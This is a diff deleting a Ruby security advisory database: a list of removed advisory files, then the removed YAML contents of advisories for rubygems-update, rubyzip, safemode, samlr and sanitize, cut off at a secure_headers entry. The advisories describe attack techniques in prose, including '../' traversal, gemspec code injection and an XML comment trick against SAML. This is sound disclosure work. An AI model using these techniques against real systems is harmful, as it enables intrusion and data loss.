  371. data/data/ruby-advisory-db/gems/paranoid2/CVE-2019-13589.yml +0 -16
  372. data/data/ruby-advisory-db/gems/paratrooper-newrelic/CVE-2014-1234.yml +0 -13
  373. data/data/ruby-advisory-db/gems/paratrooper-pingdom/CVE-2014-1233.yml +0 -13
  374. data/data/ruby-advisory-db/gems/passenger/CVE-2013-2119.yml +0 -15
  375. data/data/ruby-advisory-db/gems/passenger/CVE-2013-4136.yml +0 -14
  376. data/data/ruby-advisory-db/gems/passenger/CVE-2014-1831.yml +0 -13
  377. data/data/ruby-advisory-db/gems/passenger/CVE-2014-1832.yml +0 -13
  378. data/data/ruby-advisory-db/gems/passenger/CVE-2015-7519.yml +0 -17
  379. data/data/ruby-advisory-db/gems/passenger/CVE-2016-10345.yml +0 -17
  380. data/data/ruby-advisory-db/gems/passenger/OSVDB-90738.yml +0 -16
  381. data/data/ruby-advisory-db/gems/pdfkit/CVE-2013-1607.yml +0 -11
  382. data/data/ruby-advisory-db/gems/point-cli/CVE-2014-4997.yml +0 -8
  383. data/data/ruby-advisory-db/gems/private_address_check/CVE-2017-0904.yml +0 -17
  384. data/data/ruby-advisory-db/gems/private_address_check/CVE-2017-0909.yml +0 -15
  385. data/data/ruby-advisory-db/gems/private_address_check/CVE-2018-3759.yml +0 -14
  386. data/data/ruby-advisory-db/gems/puma/CVE-2019-16770.yml +0 -21
  387. data/data/ruby-advisory-db/gems/puma/CVE-2020-11076.yml +0 -22
  388. data/data/ruby-advisory-db/gems/puma/CVE-2020-11077.yml +0 -31
  389. data/data/ruby-advisory-db/gems/puma/CVE-2020-5247.yml +0 -25
  390. data/data/ruby-advisory-db/gems/puma/CVE-2020-5249.yml +0 -36
  391. data/data/ruby-advisory-db/gems/quick_magick/OSVDB-106954.yml +0 -7
  392. data/data/ruby-advisory-db/gems/rack/CVE-2011-5036.yml +0 -21
  393. data/data/ruby-advisory-db/gems/rack/CVE-2012-6109.yml +0 -21
  394. data/data/ruby-advisory-db/gems/rack/CVE-2013-0183.yml +0 -19
  395. data/data/ruby-advisory-db/gems/rack/CVE-2013-0184.yml +0 -20
  396. data/data/ruby-advisory-db/gems/rack/CVE-2013-0262.yml +0 -18
  397. data/data/ruby-advisory-db/gems/rack/CVE-2013-0263.yml +0 -23
  398. data/data/ruby-advisory-db/gems/rack/CVE-2015-3225.yml +0 -18
  399. data/data/ruby-advisory-db/gems/rack/CVE-2018-16470.yml +0 -56
  400. data/data/ruby-advisory-db/gems/rack/CVE-2018-16471.yml +0 -80
  401. data/data/ruby-advisory-db/gems/rack/CVE-2019-16782.yml +0 -32
  402. data/data/ruby-advisory-db/gems/rack/CVE-2020-8161.yml +0 -32
  403. data/data/ruby-advisory-db/gems/rack-attack/OSVDB-132234.yml +0 -26
  404. data/data/ruby-advisory-db/gems/rack-cache/CVE-2012-2671.yml +0 -18
  405. data/data/ruby-advisory-db/gems/rack-cors/CVE-2017-11173.yml +0 -21
  406. data/data/ruby-advisory-db/gems/rack-cors/CVE-2019-18978.yml +0 -13
  407. data/data/ruby-advisory-db/gems/rack-mini-profiler/CVE-2016-4442.yml +0 -17
  408. data/data/ruby-advisory-db/gems/rack-protection/CVE-2018-1000119.yml +0 -18
  409. data/data/ruby-advisory-db/gems/rack-protection/CVE-2018-7212.yml +0 -12
  410. data/data/ruby-advisory-db/gems/rack-ssl/CVE-2014-2538.yml +0 -11
  411. data/data/ruby-advisory-db/gems/radiant/CVE-2018-5216.yml +0 -12
  412. data/data/ruby-advisory-db/gems/radiant/CVE-2018-7261.yml +0 -13
  413. data/data/ruby-advisory-db/gems/rails-html-sanitizer/CVE-2015-7578.yml +0 -47
  414. data/data/ruby-advisory-db/gems/rails-html-sanitizer/CVE-2015-7579.yml +0 -75
  415. data/data/ruby-advisory-db/gems/rails-html-sanitizer/CVE-2015-7580.yml +0 -70
  416. data/data/ruby-advisory-db/gems/rails-html-sanitizer/CVE-2018-3741.yml +0 -20
  417. data/data/ruby-advisory-db/gems/rails_admin/CVE-2016-10522.yml +0 -21
  418. data/data/ruby-advisory-db/gems/rails_admin/CVE-2017-12098.yml +0 -22
  419. data/data/ruby-advisory-db/gems/railties/CVE-2019-5420.yml +0 -49
  420. data/data/ruby-advisory-db/gems/rake/CVE-2020-8130.yml +0 -18
  421. data/data/ruby-advisory-db/gems/rbovirt/CVE-2014-0036.yml +0 -20
  422. data/data/ruby-advisory-db/gems/rdoc/CVE-2013-0256.yml +0 -27
  423. data/data/ruby-advisory-db/gems/recurly/CVE-2017-0905.yml +0 -35
  424. data/data/ruby-advisory-db/gems/redcarpet/CVE-2015-5147.yml +0 -17
  425. data/data/ruby-advisory-db/gems/redcarpet/OSVDB-120415.yml +0 -16
  426. data/data/ruby-advisory-db/gems/redis-namespace/OSVDB-96425.yml +0 -15
  427. data/data/ruby-advisory-db/gems/redis-store/CVE-2017-1000248.yml +0 -17
  428. data/data/ruby-advisory-db/gems/refile/OSVDB-120857.yml +0 -16
  429. data/data/ruby-advisory-db/gems/rest-client/CVE-2015-1820.yml +0 -23
  430. data/data/ruby-advisory-db/gems/rest-client/CVE-2015-3448.yml +0 -15
  431. data/data/ruby-advisory-db/gems/rest-client/CVE-2019-15224.yml +0 -13
  432. data/data/ruby-advisory-db/gems/restforce/CVE-2018-3777.yml +0 -36
  433. data/data/ruby-advisory-db/gems/rexical/CVE-2019-5477.yml +0 -21
  434. data/data/ruby-advisory-db/gems/rgpg/CVE-2013-4203.yml +0 -15
  435. data/data/ruby-advisory-db/gems/rubocop/CVE-2017-8418.yml +0 -20
  436. data/data/ruby-advisory-db/gems/ruby-openid/CVE-2019-11027.yml +0 -16
  437. data/data/ruby-advisory-db/gems/ruby-saml/CVE-2016-5697.yml +0 -20
  438. data/data/ruby-advisory-db/gems/ruby-saml/CVE-2017-11428.yml +0 -27
  439. data/data/ruby-advisory-db/gems/ruby-saml/OSVDB-117903.yml +0 -13
  440. data/data/ruby-advisory-db/gems/ruby-saml/OSVDB-124383.yml +0 -11
  441. data/data/ruby-advisory-db/gems/ruby-saml/OSVDB-124991.yml +0 -13
  442. data/data/ruby-advisory-db/gems/ruby_parser/CVE-2013-0162.yml +0 -11
  443. data/data/ruby-advisory-db/gems/ruby_parser-legacy/CVE-2019-18409.yml +0 -16
  444. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2007-0469.yml +0 -18
  445. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2012-2125.yml +0 -17
  446. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2012-2126.yml +0 -15
  447. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2013-4287.yml +0 -20
  448. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2013-4363.yml +0 -21
  449. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2015-3900.yml +0 -20
  450. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2015-4020.yml +0 -20
  451. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2017-0899.yml +0 -16
  452. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2017-0900.yml +0 -16
  453. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2017-0901.yml +0 -16
  454. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2017-0902.yml +0 -16
  455. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2017-0903.yml +0 -17
  456. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8320.yml +0 -21
  457. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8321.yml +0 -16
  458. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8322.yml +0 -16
  459. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8323.yml +0 -17
  460. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8324.yml +0 -18
  461. data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8325.yml +0 -16
  462. data/data/ruby-advisory-db/gems/rubyzip/CVE-2017-5946.yml +0 -17
  463. data/data/ruby-advisory-db/gems/rubyzip/CVE-2018-1000544.yml +0 -19
  464. data/data/ruby-advisory-db/gems/rubyzip/CVE-2019-16892.yml +0 -13
  465. data/data/ruby-advisory-db/gems/safemode/CVE-2016-3693.yml +0 -13
  466. data/data/ruby-advisory-db/gems/safemode/CVE-2017-7540.yml +0 -16
  467. data/data/ruby-advisory-db/gems/samlr/CVE-2018-20857.yml +0 -16
  468. data/data/ruby-advisory-db/gems/sanitize/CVE-2018-3740.yml +0 -22
  469. data/data/ruby-advisory-db/gems/screen_capture/OSVDB-107783.yml +0 -7
  470. data/data/ruby-advisory-db/gems/secure_headers/CVE-2020-5216.yml +0 -52
  471. data/data/ruby-advisory-db/gems/secure_headers/CVE-2020-5217.yml +0 -42
  472. data/data/ruby-advisory-db/gems/sentry-raven/CVE-2014-9490.yml +0 -14
  473. data/data/ruby-advisory-db/gems/sfpagent/CVE-2014-2888.yml +0 -15
  474. data/data/ruby-advisory-db/gems/show_in_browser/CVE-2013-2105.yml +0 -8
  475. data/data/ruby-advisory-db/gems/sidekiq/OSVDB-125675.yml +0 -9
  476. data/data/ruby-advisory-db/gems/sidekiq/OSVDB-125676.yml +0 -14
  477. data/data/ruby-advisory-db/gems/sidekiq/OSVDB-125678.yml +0 -9
  478. data/data/ruby-advisory-db/gems/sidekiq-pro/OSVDB-126329.yml +0 -12
  479. data/data/ruby-advisory-db/gems/sidekiq-pro/OSVDB-126330.yml +0 -10
  480. data/data/ruby-advisory-db/gems/sidekiq-pro/OSVDB-126331.yml +0 -14
  481. data/data/ruby-advisory-db/gems/simple_captcha2/CVE-2019-14282.yml +0 -13
  482. data/data/ruby-advisory-db/gems/simple_form/CVE-2019-16676.yml +0 -15
  483. data/data/ruby-advisory-db/gems/sinatra/CVE-2018-11627.yml +0 -16
  484. data/data/ruby-advisory-db/gems/sinatra/CVE-2018-7212.yml +0 -19
  485. data/data/ruby-advisory-db/gems/slanger/CVE-2019-1010306.yml +0 -16
  486. data/data/ruby-advisory-db/gems/smart_proxy_dynflow/CVE-2018-14643.yml +0 -18
  487. data/data/ruby-advisory-db/gems/sorcery/CVE-2020-11052.yml +0 -27
  488. data/data/ruby-advisory-db/gems/sounder/CVE-2013-5647.yml +0 -14
  489. data/data/ruby-advisory-db/gems/spina/CVE-2015-4619.yml +0 -16
  490. data/data/ruby-advisory-db/gems/spree/OSVDB-119205.yml +0 -18
  491. data/data/ruby-advisory-db/gems/spree/OSVDB-125699.yml +0 -18
  492. data/data/ruby-advisory-db/gems/spree/OSVDB-125701.yml +0 -17
  493. data/data/ruby-advisory-db/gems/spree/OSVDB-125712.yml +0 -16
  494. data/data/ruby-advisory-db/gems/spree/OSVDB-125713.yml +0 -15
  495. data/data/ruby-advisory-db/gems/spree/OSVDB-69098.yml +0 -19
  496. data/data/ruby-advisory-db/gems/spree/OSVDB-73751.yml +0 -11
  497. data/data/ruby-advisory-db/gems/spree/OSVDB-76011.yml +0 -15
  498. data/data/ruby-advisory-db/gems/spree/OSVDB-81505.yml +0 -14
  499. data/data/ruby-advisory-db/gems/spree/OSVDB-81506.yml +0 -16
  500. data/data/ruby-advisory-db/gems/spree/OSVDB-90865.yml +0 -20
  501. data/data/ruby-advisory-db/gems/spree/OSVDB-91216.yml +0 -17
  502. data/data/ruby-advisory-db/gems/spree/OSVDB-91217.yml +0 -17
  503. data/data/ruby-advisory-db/gems/spree/OSVDB-91218.yml +0 -17
  504. data/data/ruby-advisory-db/gems/spree/OSVDB-91219.yml +0 -17
  505. data/data/ruby-advisory-db/gems/spree_auth/OSVDB-90865.yml +0 -16
  506. data/data/ruby-advisory-db/gems/spree_auth_devise/OSVDB-90865.yml +0 -20
  507. data/data/ruby-advisory-db/gems/sprockets/CVE-2014-7819.yml +0 -27
  508. data/data/ruby-advisory-db/gems/sprockets/CVE-2018-3760.yml +0 -23
  509. data/data/ruby-advisory-db/gems/sprout/CVE-2013-6421.yml +0 -16
  510. data/data/ruby-advisory-db/gems/strong_password/CVE-2019-13354.yml +0 -19
  511. data/data/ruby-advisory-db/gems/sup/CVE-2013-4478.yml +0 -14
  512. data/data/ruby-advisory-db/gems/sup/CVE-2013-4479.yml +0 -14
  513. data/data/ruby-advisory-db/gems/thumbshooter/CVE-2013-1898.yml +0 -9
  514. data/data/ruby-advisory-db/gems/twitter-bootstrap-rails/OSVDB-109206.yml +0 -22
  515. data/data/ruby-advisory-db/gems/uglifier/OSVDB-126747.yml +0 -19
  516. data/data/ruby-advisory-db/gems/user_agent_parser/CVE-2020-5243.yml +0 -28
  517. data/data/ruby-advisory-db/gems/web-console/CVE-2015-3224.yml +0 -22
  518. data/data/ruby-advisory-db/gems/web-console/OSVDB-112346.yml +0 -12
  519. data/data/ruby-advisory-db/gems/webbynode/CVE-2013-7086.yml +0 -12
  520. data/data/ruby-advisory-db/gems/websocket-extensions/CVE-2020-7663.yml +0 -35
  521. data/data/ruby-advisory-db/gems/wicked/CVE-2013-4413.yml +0 -14
  522. data/data/ruby-advisory-db/gems/will_paginate/CVE-2013-6459.yml +0 -15
  523. data/data/ruby-advisory-db/gems/xaviershay-dm-rails/CVE-2015-2179.yml +0 -13
  524. data/data/ruby-advisory-db/gems/yajl-ruby/CVE-2017-16516.yml +0 -19
  525. data/data/ruby-advisory-db/gems/yard/CVE-2017-17042.yml +0 -16
  526. data/data/ruby-advisory-db/gems/yard/CVE-2019-1020001.yml +0 -17
  527. data/data/ruby-advisory-db/gems/yard/GHSA-xfhh-rx56-rxcr.yml +0 -12
  528. data/data/ruby-advisory-db/lib/cf_scrape.py +0 -5
  529. data/data/ruby-advisory-db/lib/github_advisory_sync.rb +0 -296
  530. data/data/ruby-advisory-db/libraries/rubygems +0 -1
  531. data/data/ruby-advisory-db/rubies/jruby/CVE-2010-1330.yml +0 -17
  532. data/data/ruby-advisory-db/rubies/jruby/CVE-2011-4838.yml +0 -15
  533. data/data/ruby-advisory-db/rubies/jruby/CVE-2012-5370.yml +0 -17
  534. data/data/ruby-advisory-db/rubies/jruby/OSVDB-94644.yml +0 -12
  535. data/data/ruby-advisory-db/rubies/rbx/CVE-2012-5372.yml +0 -17
  536. data/data/ruby-advisory-db/rubies/rbx/OSVDB-78119.yml +0 -13
  537. data/data/ruby-advisory-db/rubies/ruby/CVE-2007-5162.yml +0 -16
  538. data/data/ruby-advisory-db/rubies/ruby/CVE-2007-5770.yml +0 -17
  539. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-1447.yml +0 -15
  540. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-1891.yml +0 -21
  541. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-2376.yml +0 -18
  542. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-2662.yml +0 -22
  543. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-2663.yml +0 -21
  544. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-2664.yml +0 -21
  545. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-2725.yml +0 -22
  546. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-2726.yml +0 -18
  547. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-3443.yml +0 -17
  548. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-3655.yml +0 -18
  549. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-3656.yml +0 -19
  550. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-3657.yml +0 -16
  551. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-3790.yml +0 -16
  552. data/data/ruby-advisory-db/rubies/ruby/CVE-2008-3905.yml +0 -17
  553. data/data/ruby-advisory-db/rubies/ruby/CVE-2009-0642.yml +0 -17
  554. data/data/ruby-advisory-db/rubies/ruby/CVE-2009-1904.yml +0 -17
  555. data/data/ruby-advisory-db/rubies/ruby/CVE-2009-4124.yml +0 -17
  556. data/data/ruby-advisory-db/rubies/ruby/CVE-2009-4492.yml +0 -20
  557. data/data/ruby-advisory-db/rubies/ruby/CVE-2009-5147.yml +0 -13
  558. data/data/ruby-advisory-db/rubies/ruby/CVE-2010-0541.yml +0 -17
  559. data/data/ruby-advisory-db/rubies/ruby/CVE-2010-2489.yml +0 -17
  560. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-0188.yml +0 -17
  561. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-1004.yml +0 -20
  562. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-1005.yml +0 -15
  563. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-2686.yml +0 -17
  564. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-2705.yml +0 -16
  565. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-3009.yml +0 -17
  566. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-3389.yml +0 -18
  567. data/data/ruby-advisory-db/rubies/ruby/CVE-2011-4815.yml +0 -14
  568. data/data/ruby-advisory-db/rubies/ruby/CVE-2012-4464.yml +0 -17
  569. data/data/ruby-advisory-db/rubies/ruby/CVE-2012-4466.yml +0 -16
  570. data/data/ruby-advisory-db/rubies/ruby/CVE-2012-4481.yml +0 -15
  571. data/data/ruby-advisory-db/rubies/ruby/CVE-2012-4522.yml +0 -16
  572. data/data/ruby-advisory-db/rubies/ruby/CVE-2012-5371.yml +0 -18
  573. data/data/ruby-advisory-db/rubies/ruby/CVE-2013-1821.yml +0 -16
  574. data/data/ruby-advisory-db/rubies/ruby/CVE-2013-2065.yml +0 -19
  575. data/data/ruby-advisory-db/rubies/ruby/CVE-2013-4073.yml +0 -21
  576. data/data/ruby-advisory-db/rubies/ruby/CVE-2013-4164.yml +0 -17
  577. data/data/ruby-advisory-db/rubies/ruby/CVE-2014-2525.yml +0 -20
  578. data/data/ruby-advisory-db/rubies/ruby/CVE-2014-3916.yml +0 -16
  579. data/data/ruby-advisory-db/rubies/ruby/CVE-2014-4975.yml +0 -17
  580. data/data/ruby-advisory-db/rubies/ruby/CVE-2014-8080.yml +0 -19
  581. data/data/ruby-advisory-db/rubies/ruby/CVE-2014-8090.yml +0 -22
  582. data/data/ruby-advisory-db/rubies/ruby/CVE-2015-1855.yml +0 -17
  583. data/data/ruby-advisory-db/rubies/ruby/CVE-2015-7551.yml +0 -19
  584. data/data/ruby-advisory-db/rubies/ruby/CVE-2015-9096.yml +0 -20
  585. data/data/ruby-advisory-db/rubies/ruby/CVE-2017-0898.yml +0 -19
  586. data/data/ruby-advisory-db/rubies/ruby/CVE-2017-10784.yml +0 -25
  587. data/data/ruby-advisory-db/rubies/ruby/CVE-2017-14033.yml +0 -22
  588. data/data/ruby-advisory-db/rubies/ruby/CVE-2017-14064.yml +0 -20
  589. data/data/ruby-advisory-db/rubies/ruby/CVE-2017-17405.yml +0 -22
  590. data/data/ruby-advisory-db/rubies/ruby/CVE-2017-17742.yml +0 -22
  591. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-16395.yml +0 -36
  592. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-16396.yml +0 -26
  593. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-6914.yml +0 -27
  594. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-8777.yml +0 -21
  595. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-8778.yml +0 -20
  596. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-8779.yml +0 -28
  597. data/data/ruby-advisory-db/rubies/ruby/CVE-2018-8780.yml +0 -22
  598. data/data/ruby-advisory-db/rubies/ruby/CVE-2019-15845.yml +0 -18
  599. data/data/ruby-advisory-db/rubies/ruby/CVE-2019-16201.yml +0 -15
  600. data/data/ruby-advisory-db/rubies/ruby/CVE-2019-16254.yml +0 -19
  601. data/data/ruby-advisory-db/rubies/ruby/CVE-2019-16255.yml +0 -20
  602. data/data/ruby-advisory-db/rubies/ruby/CVE-2020-10663.yml +0 -29
  603. data/data/ruby-advisory-db/rubies/ruby/CVE-2020-10933.yml +0 -25
  604. data/data/ruby-advisory-db/scripts/post-advisories.sh +0 -18
  605. data/data/ruby-advisory-db/spec/advisories_spec.rb +0 -23
  606. data/data/ruby-advisory-db/spec/advisory_example.rb +0 -228
  607. data/data/ruby-advisory-db/spec/gem_example.rb +0 -44
  608. data/data/ruby-advisory-db/spec/library_example.rb +0 -21
  609. data/data/ruby-advisory-db/spec/ruby_example.rb +0 -29
  610. data/data/ruby-advisory-db/spec/schemas/gem.yml +0 -71
  611. data/data/ruby-advisory-db/spec/schemas/ruby.yml +0 -36
  612. data/data/ruby-advisory-db/spec/spec_helper.rb +0 -2
  613. data/data/ruby-advisory-db.ts +0 -1
@@ -1,17 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2017-0903
5
- url: https://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
6
- title: Unsafe Object Deserialization Vulnerability in RubyGems
7
- date: 2017-10-09
8
- description: |
9
- There is a possible unsafe object deserialization vulnerability in RubyGems.
10
- It is possible for YAML deserialization of gem specifications to bypass class
11
- white lists. Specially crafted serialized objects can possibly be used to
12
- escalate to remote code execution.
13
- cvss_v2: 7.5
14
- unaffected_versions:
15
- - "< 2.0.0"
16
- patched_versions:
17
- - ">= 2.6.14"
@@ -1,21 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2019-8320
5
- url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
6
- title: Delete directory using symlink when decompressing tar
7
- date: 2019-03-05
8
- description: |
9
- A Directory Traversal issue was discovered in RubyGems 2.7.6 and later
10
- through 3.0.2. Before making new directories or touching files (which now
11
- include path-checking code for symlinks), it would delete the target
12
- destination. If that destination was hidden behind a symlink, a malicious gem
13
- could delete arbitrary files on the user’s machine, presuming the attacker
14
- could guess at paths. Given how frequently gem is run as sudo, and how
15
- predictable paths are on modern systems (/tmp, /usr, etc.), this could
16
- likely lead to data loss or an unusable system.
17
- unaffected_versions:
18
- - "< 2.7.6"
19
- patched_versions:
20
- - ">= 3.0.3"
21
- - "~> 2.7.9"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2019-8321
5
- url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
6
- title: Escape sequence injection vulnerability in verbose
7
- date: 2019-03-05
8
- description: |
9
- An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
10
- Gem::UserInteraction#verbose calls say without escaping, escape sequence
11
- injection is possible.
12
- unaffected_versions:
13
- - "< 2.6"
14
- patched_versions:
15
- - ">= 3.0.3"
16
- - "~> 2.7.9"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2019-8322
5
- url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
6
- title: Escape sequence injection vulnerability in gem owner
7
- date: 2019-03-05
8
- description: |
9
- An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem
10
- owner command outputs the contents of the API response directly to stdout.
11
- Therefore, if the response is crafted, escape sequence injection may occur.
12
- unaffected_versions:
13
- - "< 2.6"
14
- patched_versions:
15
- - ">= 3.0.3"
16
- - "~> 2.7.9"
@@ -1,17 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2019-8323
5
- url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
6
- title: Escape sequence injection vulnerability in api response handling
7
- date: 2019-03-05
8
- description: |
9
- An issue was discovered in RubyGems 2.6 and later through 3.0.2.
10
- Gem::GemcutterUtilities#with_response may output the API response to stdout
11
- as it is. Therefore, if the API side modifies the response, escape sequence
12
- injection may occur.
13
- unaffected_versions:
14
- - "< 2.6"
15
- patched_versions:
16
- - ">= 3.0.3"
17
- - "~> 2.7.9"
@@ -1,18 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2019-8324
5
- url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
6
- title: Installing a malicious gem may lead to arbitrary code execution
7
- date: 2019-03-05
8
- description: |
9
- An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted
10
- gem with a multi-line name is not handled correctly. Therefore, an attacker
11
- could inject arbitrary code to the stub line of gemspec, which is eval-ed by
12
- code in ensure_loadable_spec during the preinstall check.
13
-
14
- unaffected_versions:
15
- - "< 2.6"
16
- patched_versions:
17
- - ">= 3.0.3"
18
- - "~> 2.7.9"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: rubygems-update
3
- library: rubygems
4
- cve: 2019-8325
5
- url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
6
- title: Escape sequence injection vulnerability in errors
7
- date: 2019-03-05
8
- description: |
9
- An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
10
- Gem::CommandManager#run calls alert_error without escaping, escape sequence
11
- injection is possible. (There are many ways to cause an error.)
12
- unaffected_versions:
13
- - "< 2.6"
14
- patched_versions:
15
- - ">= 3.0.3"
16
- - "~> 2.7.9"
@@ -1,17 +0,0 @@
1
- ---
2
- gem: rubyzip
3
- cve: 2017-5946
4
- url: https://github.com/rubyzip/rubyzip/issues/315
5
- title: Directory traversal vulnerability in rubyzip
6
- date: 2017-02-27
7
- description: |
8
- The Zip::File component in the rubyzip gem before 1.2.1 for Ruby has a
9
- directory traversal vulnerability. If a site allows uploading of .zip files,
10
- an attacker can upload a malicious file that uses "../" pathname substrings to
11
- write arbitrary files to the filesystem.
12
-
13
- cvss_v2: 7.5
14
- cvss_v3: 9.8
15
-
16
- patched_versions:
17
- - ">= 1.2.1"
@@ -1,19 +0,0 @@
1
- ---
2
- gem: rubyzip
3
- date: 2018-06-14
4
- url: https://github.com/rubyzip/rubyzip/issues/369
5
- cve: 2018-1000544
6
- title: Directory Traversal in rubyzip
7
- description: |
8
- rubyzip version 1.2.1 and earlier contains a Directory Traversal vulnerability
9
- in Zip::File component that can result in write arbitrary files to the filesystem.
10
- If a site allows uploading of .zip files, an attacker can upload a malicious file
11
- which contains symlinks or files with absolute pathnames "../" to write arbitrary
12
- files to the filesystem.
13
- patched_versions:
14
- - ">= 1.2.2"
15
- related:
16
- cve:
17
- - 2017-5946
18
- url:
19
- - https://security-tracker.debian.org/tracker/CVE-2018-1000544
@@ -1,13 +0,0 @@
1
- ---
2
- gem: rubyzip
3
- cve: 2019-16892
4
- url: https://github.com/rubyzip/rubyzip/pull/403
5
- date: 2019-09-12
6
- title: Denial of Service in rubyzip ("zip bombs")
7
- description: |
8
- In Rubyzip before 1.3.0, a crafted ZIP file can bypass application
9
- checks on ZIP entry sizes because data about the uncompressed size
10
- can be spoofed. This allows attackers to cause a denial of service
11
- (disk consumption).
12
- patched_versions:
13
- - ">= 1.3.0"
@@ -1,13 +0,0 @@
1
- ---
2
- gem: safemode
3
- cve: 2016-3693
4
- title: Safemode Gem for Ruby is vulnerable to information disclosure
5
- date: 2016-04-20
6
- url: http://seclists.org/oss-sec/2016/q2/119
7
- description: |
8
- Safemode is initialised with an optional 'delegate' object.
9
- If the delegated object is a Rails controller, 'inspect' could
10
- be called which then exposes all informations about the App,
11
- including routes, secret tokens, caches and so on.
12
- patched_versions:
13
- - ">= 1.2.4"
@@ -1,16 +0,0 @@
1
- ---
2
- gem: safemode
3
- cve: 2017-7540
4
- title: Safemode Gem for Ruby is vulnerable to bypassing safe mode limitations
5
- date: 2017-04-05
6
- url: https://nvd.nist.gov/vuln/detail/CVE-2017-7540
7
- description: |
8
- Safemode, as used in Foreman, versions 1.3.2 and earlier are vulnerable
9
- to bypassing safe mode limitations via special Ruby syntax. This can
10
- lead to deletion of objects for which the user does not have delete
11
- permissions or possibly to privilege escalation.
12
- patched_versions:
13
- - ">= 1.3.3"
14
- related:
15
- url:
16
- - https://github.com/svenfuchs/safemode/pull/23
@@ -1,16 +0,0 @@
1
- ---
2
- gem: samlr
3
- cve: 2018-20857
4
- ghsa: qpxp-5j56-gg3x
5
- url: https://github.com/zendesk/samlr/pull/29
6
- date: 2019-07-31
7
- title: samlr XML nodes comment attack
8
- description: |
9
- Zendesk Samlr before 2.6.2 allows an XML nodes comment attack such as
10
- a name_id node with user@example.com followed by <!---->. and then the attacker's
11
- domain name.
12
-
13
- cvss_v3: 7.5
14
-
15
- patched_versions:
16
- - ">= 2.6.2"
@@ -1,22 +0,0 @@
1
- ---
2
- gem: sanitize
3
- cve: 2018-3740
4
- date: 2018-03-19
5
- url: https://github.com/rgrove/sanitize/issues/176
6
- title: HTML injection/XSS in Sanitize
7
- description: |
8
- When Sanitize gem is used in combination with libxml2 >= 2.9.2,
9
- a specially crafted HTML fragment can cause libxml2 to generate
10
- improperly escaped output, allowing non-whitelisted attributes to be
11
- used on whitelisted elements.
12
-
13
- This can allow HTML and JavaScript injection, which could result in XSS
14
- if Sanitize's output is served to browsers.
15
- unaffected_versions:
16
- - "< 1.1.0"
17
- patched_versions:
18
- - "~> 2.1.1"
19
- - ">= 4.6.3"
20
- related:
21
- url:
22
- - https://github.com/rgrove/sanitize/commit/01629a162e448a83d901456d0ba8b65f3b03d46e
@@ -1,7 +0,0 @@
1
- ---
2
- gem: screen_capture
3
- osvdb: 107783
4
- url: http://osvdb.org/show/osvdb/107783
5
- title: Screen Capture Gem for Ruby screen_capture.rb URL Handling Arbitrary Command Execution
6
- date: 2014-06-07
7
- description: Screen Capture Gem for Ruby contains a flaw in screen_capture.rb that is triggered when handling input passed via the URL. This may allow a context-dependent attacker to execute arbitrary commands.
@@ -1,52 +0,0 @@
1
- ---
2
- gem: secure_headers
3
- cve: 2020-5216
4
- ghsa: w978-rmpf-qmwg
5
- url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
6
- date: 2020-01-23
7
